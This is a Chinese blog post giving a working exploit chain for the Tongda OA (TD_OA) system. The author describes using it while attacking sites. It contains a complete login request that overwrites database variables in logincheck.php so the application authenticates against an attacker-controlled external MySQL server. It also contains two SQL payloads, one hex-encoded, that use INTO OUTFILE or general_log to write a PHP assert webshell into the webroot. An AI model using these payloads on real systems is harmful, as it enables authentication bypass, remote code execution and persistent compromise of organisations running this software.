漏洞详情:http://www.anquan.us/static/bugs/wooyun-2016-0168661.html
团队一起日站的时候发现了一个oa,然后就一顿乌云找到了这个,成功getshell。
变量覆盖
登录构造请求数据包
POST /logincheck.php HTTP/1.1 Host: xx.xx.com Content-Length: 182 Cache-Control: max-age=0 Origin: http://xx.xx.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://xx.xx.com Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: SID_1=8b3cb1d3; PHPSESSID=he68espbvu9oq0rgamruvhs114 Connection: close USERNAME=admin&PASSWORD=&MYOA_MASTER_DB[id]=1&MYOA_MASTER_DB[host]=123.123.123.123&MYOA_MASTER_DB[user]=root&MYOA_MASTER_DB[pwd]=rootpassword&MYOA_MASTER_DB[db]=oa&encode_type=1&button=
其中的MySQL数据库链接配置需要自己搭建外网MySQL,并且开通root外链。
TD_OA.sql 下载导入
getshell
后台有 sql 导入功能, 有两种方法, 使用 into outfile
或者用 general_log
update mysql.user set file_priv='Y' where user='root'; flush privileges; select concat("'",0x3C3F7068702061737365727428245F504F53545B615D29203F3E) into outfile '../webroot/test.php'; update mysql.user set file_priv='N' where user='root'; flush privileges;
set global general_log = on; set global general_log_file = '../webroot/test.php'; select '<?php assert($_POST[a]) ?>'; set global general_log = off;
原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er